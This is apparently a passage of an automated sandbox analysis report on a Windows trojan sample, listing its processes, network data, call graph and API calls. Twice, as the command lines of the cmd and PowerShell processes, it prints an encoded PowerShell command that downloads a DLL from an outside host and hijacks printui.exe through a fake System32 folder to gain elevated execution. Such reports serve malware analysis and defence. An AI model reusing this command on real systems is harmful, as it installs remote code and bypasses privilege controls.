                            2024-09-03 06:30:31 UTC16384INData Raw: 11 49 d1 f8 48 d1 fa 48 29 d0 49 39 c0 4c 0f 47 c0 49 39 d2 72 0f 4c 89 5c 24 20 e8 20 e3 ff ff 48 83 c4 38 c3 48 8d 0d 1c 02 ba 05 49 89 d0 4d 89 d1 48 8d 15 4e 03 ba 05 e8 a2 25 00 00 90 90 0f b7 44 24 28 49 29 d0 48 2b 11 89 44 24 28 49 d1 f8 48 d1 fa e9 e6 ea ff ff 90 90 90 90 90 90 55 57 56 53 48 83 ec 38 48 89 cf 4c 89 c9 4c 89 c6 48 89 d3 4c 89 cd e8 b4 94 fe ff 4c 8b 4f 08 4d 89 c8 49 29 d8 49 39 f0 4c 0f 47 c6 49 39 d9 72 1c 48 89 44 24 20 49 89 e9 48 89 da 48 89 f9 e8 9b e2 ff ff 48 83 c4 38 5b 5e 5f 5d c3 48 8d 15 d2 02 ba 05 49 89 d8 48 8d 0d 89 01 ba 05 e8 1c 25 00 00 90 90 90 90 90 90 90 90 90 90 90 90 48 83 ec 28 4c 8b 51 08 4c 8b 5c 24 50 4c 89 d0 48 29 d0 4c 39 c0 4c 0f 46 c0 49 39 d2 72 0e 4c 89 5c 24 50 48 83 c4 28 e9 43 e2 ff ff 48 8d
                            Data Ascii: IHH)I9LGI9rL\$ H8HIMHN%D$(I)H+D$(IHUWVSH8HLLHLLOMI)I9LGI9rHD$ IHHH8[^_]HIH%H(LQL\$PLH)L9LFI9rL\$PH(CH


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:02:30:21
                            Start date:03/09/2024
                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exe"
                            Imagebase:0x7ff733a90000
                            File size:2'633'876 bytes
                            MD5 hash:7AD7164ED33D36B88C59FAD18B28C429
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:2
                            Start time:02:30:26
                            Start date:03/09/2024
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                            Imagebase:0x7ff7e52b0000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            General

                            Target ID:3
                            Start time:02:30:27
                            Start date:03/09/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;"
                            Imagebase:0x7ff737870000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:4
                            Start time:02:30:27
                            Start date:03/09/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:5
                            Start time:02:30:27
                            Start date:03/09/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3BhbmNoaXRvcGlzdG9sZXN4L2l0ZW1zL21haW4vdXN2Y3VzYi5kYXQiIC1PdXRGaWxlICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCI7DQpTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDUwMDA7DQppZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1wkZW52OlVzZXJOYW1lXEFwcERhdGFcUm9hbWluZ1xweWxkLmRsbCIpew0KCU5ldy1JdGVtIC1QYXRoICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiIC1JdGVtVHlwZSBEaXJlY3RvcnkgLUZvcmNlOw0KCUNvcHktSXRlbSAtUGF0aCAiQzpcV2luZG93c1xTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLURlc3RpbmF0aW9uICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSIgLUZvcmNlOw0KCU1vdmUtSXRlbSAtUGF0aCAiQzpcVXNlcnNcJGVudjpVc2VyTmFtZVxBcHBEYXRhXFJvYW1pbmdccHlsZC5kbGwiIC1EZXN0aW5hdGlvbiAiQzpcV2luZG93cyBcU3lzdGVtMzJccHJpbnR1aS5kbGwiIC1Gb3JjZTsNCglTdGFydC1TbGVlcCAtTWlsbGlzZWNvbmRzIDE1MDA7DQoJU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFdpbmRvd3MgXFN5c3RlbTMyXHByaW50dWkuZXhlIjsJDQp9')); Invoke-Expression $decoded;"
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:8
                            Start time:02:32:14
                            Start date:03/09/2024
                            Path:C:\Windows \System32\printui.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows \System32\printui.exe"
                            Imagebase:0x7ff763690000
                            File size:64'000 bytes
                            MD5 hash:2FC3530F3E05667F8240FC77F7486E7E
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            • Detection: 0%, Virustotal, Browse
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:11
                            Start time:02:32:15
                            Start date:03/09/2024
                            Path:C:\Windows \System32\printui.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows \System32\printui.exe"
                            Imagebase:0x7ff763690000
                            File size:64'000 bytes
                            MD5 hash:2FC3530F3E05667F8240FC77F7486E7E
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:false

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:1%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:15.5%
                              Total number of Nodes:453
                              Total number of Limit Nodes:9
                              execution_graph 69380 7ff733a913d0 69383 7ff733a91180 69380->69383 69382 7ff733a913e6 69384 7ff733a911b0 69383->69384 69385 7ff733a911cd 69384->69385 69386 7ff733a911b9 Sleep 69384->69386 69389 7ff733a911e1 69385->69389 69483 7ff733aa6a00 __stdio_common_vfprintf __acrt_iob_func 69385->69483 69386->69384 69388 7ff733a9134c _initterm 69390 7ff733a91200 69388->69390 69389->69388 69389->69390 69399 7ff733a912ef 69389->69399 69400 7ff733a9cd20 69390->69400 69392 7ff733a91228 SetUnhandledExceptionFilter _set_invalid_parameter_handler 69422 7ff733a9cb30 69392->69422 69394 7ff733a91250 malloc 69395 7ff733a9127a 69394->69395 69394->69399 69396 7ff733a91280 strlen malloc memcpy 69395->69396 69396->69396 69397 7ff733a912b3 69396->69397 69423 7ff733a91bd0 69397->69423 69399->69382 69402 7ff733a9cd50 69400->69402 69421 7ff733a9cd3f 69400->69421 69401 7ff733a9d030 69403 7ff733a9d039 69401->69403 69401->69421 69402->69401 69404 7ff733a9cf4e 69402->69404 69415 7ff733a9cdca 69402->69415 69402->69421 69407 7ff733a9d061 69403->69407 69485 7ff733a9cbb0 9 API calls 69403->69485 69404->69407 69412 7ff733a9cf69 69404->69412 69405 7ff733a9d072 69487 7ff733a9cb40 9 API calls 69405->69487 69486 7ff733a9cb40 9 API calls 69407->69486 69410 7ff733a9d07e 69410->69392 69411 7ff733a9cbb0 9 API calls 69413 7ff733a9cf7a 69411->69413 69412->69413 69413->69411 69413->69412 69484 7ff733a9cb40 9 API calls 69413->69484 69415->69404 69415->69405 69415->69407 69415->69412 69415->69413 69416 7ff733a9ce31 69415->69416 69415->69421 69416->69413 69416->69415 69417 7ff733a9cbb0 9 API calls 69416->69417 69418 7ff733a9cedd 69416->69418 69419 7ff733a9cee0 69416->69419 69417->69416 69418->69419 69420 7ff733a9cf12 VirtualProtect 69419->69420 69419->69421 69420->69419 69421->69392 69422->69394 69424 7ff733a91bf0 69423->69424 69488 7ff733a915bc 69424->69488 69426 7ff733a91c09 69426->69399 69427 7ff733a91bf5 69427->69426 69530 7ff733aac850 69427->69530 69429 7ff733a91c5f 69536 7ff733a919e0 69429->69536 69431 7ff733a91c6e 69432 7ff733aac850 57 API calls 69431->69432 69435 7ff733a91cb9 69431->69435 69433 7ff733a91caa 69432->69433 69434 7ff733a919e0 52 API calls 69433->69434 69434->69435 69435->69426 69541 7ff733b32810 69435->69541 69439 7ff733a9217b 69440 7ff733b32810 52 API calls 69439->69440 69441 7ff733a921ed 69440->69441 69442 7ff733aad9d0 52 API calls 69441->69442 69443 7ff733a92203 69442->69443 69549 7ff733aad940 69443->69549 69445 7ff733a9223b 69446 7ff733b32810 52 API calls 69445->69446 69447 7ff733a9228b 69446->69447 69448 7ff733aad9d0 52 API calls 69447->69448 69449 7ff733a922a1 69448->69449 69450 7ff733aad940 52 API calls 69449->69450 69451 7ff733a922d9 69450->69451 69452 7ff733b32810 52 API calls 69451->69452 69453 7ff733a92337 69452->69453 69454 7ff733aad9d0 52 API calls 69453->69454 69455 7ff733a9234d 69454->69455 69456 7ff733b32810 52 API calls 69455->69456 69457 7ff733a9242c 69456->69457 69458 7ff733aad9d0 52 API calls 69457->69458 69459 7ff733a92442 69458->69459 69460 7ff733b32810 52 API calls 69459->69460 69461 7ff733a924b8 69460->69461 69462 7ff733aad9d0 52 API calls 69461->69462 69463 7ff733a924ce 69462->69463 69464 7ff733b32810 52 API calls 69463->69464 69465 7ff733a925c2 69464->69465 69466 7ff733aad9d0 52 API calls 69465->69466 69467 7ff733a925d8 69466->69467 69468 7ff733b32810 52 API calls 69467->69468 69469 7ff733a9264e 69468->69469 69470 7ff733aad9d0 52 API calls 69469->69470 69471 7ff733a92664 69470->69471 69472 7ff733aad940 52 API calls 69471->69472 69473 7ff733a9269c 69472->69473 69474 7ff733b32810 52 API calls 69473->69474 69475 7ff733a9271d 69474->69475 69476 7ff733aad9d0 52 API calls 69475->69476 69477 7ff733a92733 69476->69477 69477->69426 69553 7ff733aac750 69477->69553 69479 7ff733a9282a 69480 7ff733aac750 57 API calls 69479->69480 69481 7ff733a92843 69480->69481 69481->69426 69559 7ff733b47bf0 52 API calls 69481->69559 69483->69389 69484->69413 69485->69403 69486->69405 69487->69410 69489 7ff733a915d2 69488->69489 69490 7ff733aac750 57 API calls 69489->69490 69529 7ff733a915e3 69489->69529 69491 7ff733a91606 69490->69491 69560 7ff733a9147d strcmp 69491->69560 69493 7ff733a91620 69494 7ff733aac750 57 API calls 69493->69494 69493->69529 69495 7ff733a91658 69494->69495 69561 7ff733a9147d strcmp 69495->69561 69497 7ff733a91672 69498 7ff733aac750 57 API calls 69497->69498 69497->69529 69499 7ff733a916aa 69498->69499 69562 7ff733a9147d strcmp 69499->69562 69501 7ff733a916c4 69502 7ff733aac750 57 API calls 69501->69502 69501->69529 69503 7ff733a916fb 69502->69503 69563 7ff733a9147d strcmp 69503->69563 69505 7ff733a91714 69506 7ff733aac750 57 API calls 69505->69506 69505->69529 69507 7ff733a9174b 69506->69507 69564 7ff733a9147d strcmp 69507->69564 69509 7ff733a91765 69510 7ff733aac750 57 API calls 69509->69510 69509->69529 69511 7ff733a9179d 69510->69511 69565 7ff733a9147d strcmp 69511->69565 69513 7ff733a917b7 69514 7ff733aac750 57 API calls 69513->69514 69513->69529 69515 7ff733a917ef 69514->69515 69566 7ff733a9147d strcmp 69515->69566 69517 7ff733a91809 69518 7ff733aac750 57 API calls 69517->69518 69517->69529 69519 7ff733a91844 69518->69519 69567 7ff733a9147d strcmp 69519->69567 69521 7ff733a91861 69522 7ff733aac750 57 API calls 69521->69522 69521->69529 69523 7ff733a9189f 69522->69523 69568 7ff733a9147d strcmp 69523->69568 69525 7ff733a918bc 69526 7ff733aac750 57 API calls 69525->69526 69525->69529 69527 7ff733a918f7 69526->69527 69569 7ff733a9147d strcmp 69527->69569 69529->69427 69531 7ff733aac88b 69530->69531 69570 7ff733aac690 69531->69570 69533 7ff733aac8a2 69534 7ff733aac8ec 69533->69534 69577 7ff733b3afa0 51 API calls 69533->69577 69534->69429 69592 7ff733b328c0 69536->69592 69538 7ff733a91a6a 69538->69431 69539 7ff733a91aa1 wcscmp 69540 7ff733a91a29 69539->69540 69540->69538 69540->69539 69542 7ff733b32846 69541->69542 69631 7ff733b325e0 69542->69631 69545 7ff733aad9d0 69546 7ff733aad9f4 69545->69546 69547 7ff733b32790 52 API calls 69546->69547 69548 7ff733aada11 69547->69548 69548->69439 69550 7ff733aad963 69549->69550 69551 7ff733b32790 52 API calls 69550->69551 69552 7ff733aad972 69551->69552 69552->69445 69554 7ff733aac78b 69553->69554 69555 7ff733aac690 57 API calls 69554->69555 69556 7ff733aac7a2 69555->69556 69557 7ff733aac7ec 69556->69557 69659 7ff733b36f90 51 API calls 69556->69659 69557->69479 69559->69426 69560->69493 69561->69497 69562->69501 69563->69505 69564->69509 69565->69513 69566->69517 69567->69521 69568->69525 69569->69529 69578 7ff733b32790 69570->69578 69572 7ff733aac6b7 69582 7ff733aadaf0 69572->69582 69574 7ff733aac716 69575 7ff733b32790 52 API calls 69574->69575 69576 7ff733aac734 69575->69576 69576->69533 69577->69534 69579 7ff733b327ac 69578->69579 69581 7ff733b327d6 69579->69581 69590 7ff733b32380 52 API calls 69579->69590 69581->69572 69583 7ff733aadb24 69582->69583 69588 7ff733aadb2d 69583->69588 69591 7ff733aadd30 53 API calls 69583->69591 69585 7ff733aadc49 memcpy memset 69587 7ff733aadc05 69585->69587 69586 7ff733aadb4b 69586->69585 69586->69587 69587->69588 69589 7ff733aadccc memcpy 69587->69589 69588->69574 69589->69588 69590->69581 69591->69586 69597 7ff733b32570 69592->69597 69596 7ff733b328fd 69596->69540 69598 7ff733b325a9 69597->69598 69599 7ff733b325d0 69598->69599 69605 7ff733b4b1b0 51 API calls 69598->69605 69601 7ff733b0f950 69599->69601 69602 7ff733b0f977 69601->69602 69606 7ff733b0f860 69602->69606 69605->69599 69609 7ff733b0f6f0 69606->69609 69610 7ff733b0f707 69609->69610 69611 7ff733b0f72d 69609->69611 69613 7ff733b27e10 69610->69613 69611->69596 69614 7ff733b27e49 69613->69614 69615 7ff733b27e4e 69613->69615 69628 7ff733b4afc0 51 API calls 69614->69628 69619 7ff733b4a2b0 69615->69619 69620 7ff733b4a2c4 malloc 69619->69620 69621 7ff733b27e5a 69620->69621 69623 7ff733b4a2d7 69620->69623 69621->69611 69622 7ff733b4a2e5 69629 7ff733b4a390 51 API calls 69622->69629 69623->69620 69623->69622 69625 7ff733b4a2ef 69630 7ff733b4a9e0 51 API calls 69625->69630 69629->69625 69632 7ff733b32635 69631->69632 69633 7ff733b32570 51 API calls 69632->69633 69634 7ff733b32644 69633->69634 69635 7ff733b0f6f0 51 API calls 69634->69635 69636 7ff733b3264f 69635->69636 69639 7ff733b45ca0 69636->69639 69642 7ff733b459a0 69639->69642 69645 7ff733b2eae0 69642->69645 69648 7ff733b463d0 69645->69648 69649 7ff733b463f3 69648->69649 69652 7ff733b43650 69649->69652 69651 7ff733a92165 69651->69545 69653 7ff733b43674 69652->69653 69656 7ff733b43fb0 69653->69656 69655 7ff733b436a0 69655->69651 69657 7ff733b43ff0 memcpy 69656->69657 69658 7ff733b43fdb 69657->69658 69658->69655 69659->69557 69660 7ff733aa9550 69661 7ff733aa9578 69660->69661 69662 7ff733aa955c 69660->69662 69663 7ff733aa9581 69661->69663 69664 7ff733aa9660 AddVectoredExceptionHandler 69661->69664 69665 7ff733aa9640 RemoveVectoredExceptionHandler 69662->69665 69695 7ff733aa9565 69662->69695 69666 7ff733aa9591 TlsGetValue 69663->69666 69663->69695 69665->69695 69667 7ff733aa959f 69666->69667 69666->69695 69668 7ff733aa95b1 69667->69668 69669 7ff733aa9690 69667->69669 69670 7ff733aa95c2 69668->69670 69671 7ff733aa95bd 69668->69671 69672 7ff733aa9700 69669->69672 69673 7ff733aa969e 69669->69673 69679 7ff733aa95df 69670->69679 69680 7ff733aa95cb CloseHandle 69670->69680 69701 7ff733aa9270 77 API calls 69671->69701 69674 7ff733aa9705 CloseHandle 69672->69674 69675 7ff733aa9738 69672->69675 69677 7ff733aa96a3 CloseHandle 69673->69677 69678 7ff733aa96a9 69673->69678 69705 7ff733aa86e0 CloseHandle free 69674->69705 69706 7ff733aa86e0 CloseHandle free 69675->69706 69677->69678 69683 7ff733aa96c7 69678->69683 69684 7ff733aa96cc 69678->69684 69702 7ff733aa86e0 CloseHandle free 69679->69702 69680->69679 69685 7ff733aa95dd CloseHandle 69680->69685 69703 7ff733aa9270 77 API calls 69683->69703 69684->69675 69689 7ff733aa96d2 69684->69689 69685->69679 69687 7ff733aa9740 69693 7ff733aa971b 69687->69693 69689->69679 69690 7ff733aa96e5 CloseHandle 69689->69690 69704 7ff733aa86e0 CloseHandle free 69690->69704 69692 7ff733aa95ef 69692->69693 69697 7ff733aa9742 69692->69697 69698 7ff733aa9616 TlsSetValue 69692->69698 69693->69695 69708 7ff733aa8bd0 GetCurrentThreadId _ultoa OutputDebugStringA abort 69693->69708 69694 7ff733aa96fb 69694->69692 69707 7ff733aa8ed0 15 API calls 69697->69707 69698->69695 69701->69670 69702->69692 69703->69684 69704->69694 69705->69693 69706->69687 69709 7ff733b3fef0 69710 7ff733b3ff0a 69709->69710 69711 7ff733b3ff06 69709->69711 69711->69710 69712 7ff733b40150 69711->69712 69713 7ff733b3ff30 69711->69713 69758 7ff733b40280 __acrt_iob_func 69712->69758 69787 7ff733b31fa0 51 API calls 69713->69787 69716 7ff733b3ff51 69788 7ff733b31fa0 51 API calls 69716->69788 69717 7ff733b40155 69717->69717 69719 7ff733b3ff64 69789 7ff733b31fa0 51 API calls 69719->69789 69721 7ff733b3ff77 69790 7ff733b31fa0 51 API calls 69721->69790 69723 7ff733b3ff95 69791 7ff733b31fa0 51 API calls 69723->69791 69725 7ff733b3ffa8 69792 7ff733b31fa0 51 API calls 69725->69792 69727 7ff733b3ffbb __acrt_iob_func 69793 7ff733aaea90 170 API calls 69727->69793 69729 7ff733b3ffe4 __acrt_iob_func 69794 7ff733aaea90 170 API calls 69729->69794 69731 7ff733b40003 __acrt_iob_func 69795 7ff733aaea90 170 API calls 69731->69795 69733 7ff733b40028 69796 7ff733b422a0 51 API calls 69733->69796 69735 7ff733b4003f 69797 7ff733b422a0 51 API calls 69735->69797 69737 7ff733b40056 69798 7ff733b422a0 51 API calls 69737->69798 69739 7ff733b40069 69799 7ff733b422a0 51 API calls 69739->69799 69741 7ff733b4007c __acrt_iob_func 69800 7ff733aaeec0 170 API calls 69741->69800 69743 7ff733b400a1 __acrt_iob_func 69801 7ff733aaeec0 170 API calls 69743->69801 69745 7ff733b400c0 __acrt_iob_func 69802 7ff733aaeec0 170 API calls 69745->69802 69747 7ff733b400e5 69803 7ff733b42c10 51 API calls 69747->69803 69749 7ff733b400f8 69804 7ff733b42c10 51 API calls 69749->69804 69751 7ff733b4010f 69805 7ff733b42c10 51 API calls 69751->69805 69753 7ff733b40122 69806 7ff733b42c10 51 API calls 69753->69806 69755 7ff733b40135 69807 7ff733b40950 51 API calls 69755->69807 69757 7ff733b4013f 69808 7ff733b31ea0 69758->69808 69761 7ff733b31ea0 165 API calls 69762 7ff733b4039e __acrt_iob_func 69761->69762 69763 7ff733b31ea0 165 API calls 69762->69763 69764 7ff733b403f9 69763->69764 69829 7ff733b41fe0 165 API calls 69764->69829 69766 7ff733b40458 69830 7ff733b41fe0 165 API calls 69766->69830 69768 7ff733b404ba 69831 7ff733b41fe0 165 API calls 69768->69831 69770 7ff733b40501 69832 7ff733b41fe0 165 API calls 69770->69832 69772 7ff733b4054d __acrt_iob_func 69773 7ff733b31ea0 165 API calls 69772->69773 69774 7ff733b405ba __acrt_iob_func 69773->69774 69775 7ff733b31ea0 165 API calls 69774->69775 69776 7ff733b40621 __acrt_iob_func 69775->69776 69777 7ff733b31ea0 165 API calls 69776->69777 69778 7ff733b40680 69777->69778 69833 7ff733b42950 165 API calls 69778->69833 69780 7ff733b406e3 69834 7ff733b42950 165 API calls 69780->69834 69782 7ff733b4074c 69835 7ff733b42950 165 API calls 69782->69835 69784 7ff733b4079a 69836 7ff733b42950 165 API calls 69784->69836 69786 7ff733b407f4 69786->69717 69787->69716 69788->69719 69789->69721 69790->69723 69791->69725 69792->69727 69793->69729 69794->69731 69795->69733 69796->69735 69797->69737 69798->69739 69799->69741 69800->69743 69801->69745 69802->69747 69803->69749 69804->69751 69805->69753 69806->69755 69807->69757 69837 7ff733aa99d0 69808->69837 69810 7ff733b31ec5 69813 7ff733b31edb 69810->69813 69897 7ff733b30be0 121 API calls 69810->69897 69812 7ff733b31f13 __acrt_iob_func 69812->69761 69813->69812 69868 7ff733aad570 128 API calls 69813->69868 69815 7ff733b31eeb 69869 7ff733aa8260 69815->69869 69817 7ff733b31ef6 69818 7ff733b31efa 69817->69818 69819 7ff733b31f4e 69817->69819 69888 7ff733aa8550 69818->69888 69898 7ff733ab0430 51 API calls 69819->69898 69822 7ff733b31f0f 69822->69812 69823 7ff733b31f8d 69822->69823 69827 7ff733b31f5c 69822->69827 69901 7ff733a9dd00 RtlCaptureContext RtlUnwindEx abort 69823->69901 69827->69822 69899 7ff733b4a390 51 API calls 69827->69899 69900 7ff733b4a9e0 51 API calls 69827->69900 69829->69766 69830->69768 69831->69770 69832->69772 69833->69780 69834->69782 69835->69784 69836->69786 69838 7ff733aa9af8 69837->69838 69839 7ff733aa99eb 69837->69839 69838->69810 69840 7ff733aa9a2b 69839->69840 69902 7ff733aa8950 69839->69902 69840->69810 69842 7ff733aa99f5 69843 7ff733aa8260 10 API calls 69842->69843 69844 7ff733aa9a04 69843->69844 69845 7ff733aa9a40 69844->69845 69846 7ff733aa9a0c 69844->69846 69909 7ff733aa9050 69845->69909 69848 7ff733aa9ad0 __acrt_iob_func 69846->69848 69866 7ff733aa9a16 69846->69866 69941 7ff733aa6890 __stdio_common_vfprintf 69848->69941 69851 7ff733aa8550 3 API calls 69852 7ff733aa9a1e 69851->69852 69852->69840 69940 7ff733aa8cf0 __stdio_common_vfprintf CloseHandle free free __acrt_iob_func 69852->69940 69853 7ff733aa9a6f 69855 7ff733aa9050 19 API calls 69853->69855 69862 7ff733aa9b1a 69853->69862 69854 7ff733aa9b38 69856 7ff733aa9100 30 API calls 69854->69856 69858 7ff733aa9a83 TlsGetValue 69855->69858 69856->69853 69859 7ff733aa9b20 69858->69859 69860 7ff733aa9a95 69858->69860 69926 7ff733aa9100 69859->69926 69860->69862 69863 7ff733aa9050 19 API calls 69860->69863 69864 7ff733aa9aab TlsGetValue 69863->69864 69865 7ff733aa9b10 69864->69865 69864->69866 69867 7ff733aa9100 30 API calls 69865->69867 69866->69851 69866->69862 69867->69866 69868->69815 69870 7ff733aa82b0 69869->69870 69871 7ff733aa8275 69869->69871 69960 7ff733aa81f0 malloc 69870->69960 69873 7ff733aa8287 69871->69873 69876 7ff733aa8320 GetCurrentThreadId 69871->69876 69877 7ff733aa82d7 69871->69877 69885 7ff733aa82c0 69871->69885 69875 7ff733aa82a0 GetCurrentThreadId 69873->69875 69878 7ff733aa828e 69873->69878 69874 7ff733aa82b8 69874->69871 69874->69885 69875->69878 69876->69877 69876->69878 69879 7ff733aa8350 CreateEventA 69877->69879 69880 7ff733aa82de 69877->69880 69878->69817 69881 7ff733aa8388 GetLastError 69879->69881 69882 7ff733aa8368 69879->69882 69880->69873 69883 7ff733aa82eb 69880->69883 69881->69885 69882->69880 69884 7ff733aa8376 CloseHandle 69882->69884 69883->69880 69887 7ff733aa82fd 69883->69887 69961 7ff733aa80d0 GetTickCount64 GetTickCount64 WaitForSingleObject WaitForSingleObject 69883->69961 69884->69880 69885->69817 69885->69885 69887->69817 69889 7ff733aa8562 69888->69889 69890 7ff733aa8580 69888->69890 69892 7ff733aa8570 69889->69892 69894 7ff733aa85cb GetCurrentThreadId 69889->69894 69896 7ff733aa8579 69889->69896 69962 7ff733aa81f0 malloc 69890->69962 69895 7ff733aa85a0 SetEvent 69892->69895 69892->69896 69893 7ff733aa8585 69893->69889 69893->69896 69894->69892 69894->69896 69895->69896 69896->69822 69897->69813 69899->69827 69903 7ff733aa8969 69902->69903 69904 7ff733aa8975 calloc 69903->69904 69905 7ff733aa8980 69903->69905 69908 7ff733aa8991 69904->69908 69907 7ff733aa89b0 calloc 69905->69907 69905->69908 69907->69908 69908->69842 69910 7ff733aa9061 69909->69910 69911 7ff733aa90b0 TlsGetValue 69909->69911 69912 7ff733aa8950 2 API calls 69910->69912 69911->69853 69911->69854 69913 7ff733aa9070 69912->69913 69914 7ff733aa8260 10 API calls 69913->69914 69915 7ff733aa907f 69914->69915 69916 7ff733aa9089 TlsAlloc 69915->69916 69917 7ff733aa90d8 69915->69917 69918 7ff733b4b836 abort 69916->69918 69919 7ff733aa909e 69916->69919 69917->69919 69920 7ff733aa90dd __acrt_iob_func 69917->69920 69922 7ff733b4b83c abort 69918->69922 69923 7ff733aa8550 3 API calls 69919->69923 69942 7ff733aa6890 __stdio_common_vfprintf 69920->69942 69925 7ff733b4b855 69922->69925 69923->69911 69924 7ff733aa90fd 69924->69918 69924->69919 69925->69925 69943 7ff733aa8e00 69926->69943 69929 7ff733aa9218 69929->69860 69930 7ff733aa9127 GetCurrentThreadId CreateEventA 69931 7ff733aa915f 69930->69931 69932 7ff733aa9226 69931->69932 69933 7ff733aa9168 GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 69931->69933 69957 7ff733aa8bd0 GetCurrentThreadId _ultoa OutputDebugStringA abort 69932->69957 69934 7ff733b4b83c abort 69933->69934 69935 7ff733aa91cc GetThreadPriority TlsSetValue 69933->69935 69939 7ff733b4b855 69934->69939 69937 7ff733aa9206 69935->69937 69938 7ff733aa922b 69935->69938 69937->69860 69938->69934 69939->69939 69941->69866 69942->69924 69944 7ff733aa8260 10 API calls 69943->69944 69945 7ff733aa8e16 69944->69945 69946 7ff733aa8e22 69945->69946 69947 7ff733aa8e78 calloc 69945->69947 69958 7ff733aa8a10 malloc realloc memcpy 69946->69958 69949 7ff733aa8e8f 69947->69949 69950 7ff733aa8e54 69947->69950 69959 7ff733aa8a10 malloc realloc memcpy 69949->69959 69951 7ff733aa8550 3 API calls 69950->69951 69953 7ff733aa8e5c 69951->69953 69953->69929 69953->69930 69954 7ff733aa8e97 69955 7ff733aa8ec0 free 69954->69955 69956 7ff733aa8e2a 69954->69956 69955->69950 69956->69950 69958->69956 69959->69954 69960->69874 69961->69883 69962->69893

                              Executed Functions

                              Function 00007FF733AA9550 Relevance: 13.6, APIs: 9, Instructions: 121COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
